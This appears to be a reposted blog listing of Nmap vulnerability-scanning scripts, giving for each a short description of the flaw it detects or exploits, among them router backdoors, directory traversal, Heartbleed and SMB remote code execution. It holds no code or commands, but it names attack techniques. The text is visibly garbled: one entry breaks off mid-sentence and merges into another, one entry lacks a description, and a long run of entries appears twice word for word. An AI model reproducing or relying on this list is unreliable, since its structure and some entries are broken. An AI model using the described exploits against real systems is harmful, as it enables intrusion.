Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf
This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor
Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss
It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum
Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter
Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login
Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git
Checks for a Git repository found in a website’s document root /.git/
http-huawei-hg5xx-vuln
Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln
Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure
Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper
Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal
Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss
Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock
Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check
Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection
Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss
Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace
Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392
Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738
Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861
Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192
Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368
Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:
the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.
http-vuln-cve2012-1823
Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156
Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786
Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091
An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704
Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions
Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions http-vuln-cve2015-1427
This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635
Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638
Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie
Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds
A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users
Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero
IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels
Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor
Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122
netbus-auth-bypass
Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec
Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020
Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass
Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader
Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182
Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker
Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103
Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025
Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067
Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054
Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061
Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos
Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344
Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720
Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764
Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection
Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr
Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params
Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed
Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford ([email protected])
ssl-known-key
Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle
Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown
Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed
Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version
Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020
Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass
Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader
Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182
Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker
Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103
Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025
Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067
Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054
Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061
Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos
Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344
Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720
Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764
Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection
Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr
Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params
Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed
Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford ([email protected])
ssl-known-key
Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle
Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown
Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed
Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version
Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the originial post: here
